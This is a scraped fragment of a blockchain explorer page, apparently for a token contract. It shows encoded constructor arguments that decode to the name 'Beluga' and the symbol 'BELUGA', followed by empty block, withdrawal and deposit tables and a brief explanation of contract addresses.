Arg [3] : 0000000000000000000000000000000000000000000000000000000000000006
Arg [4] : 42656c7567610000000000000000000000000000000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000006
Arg [6] : 42454c5547410000000000000000000000000000000000000000000000000000


Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.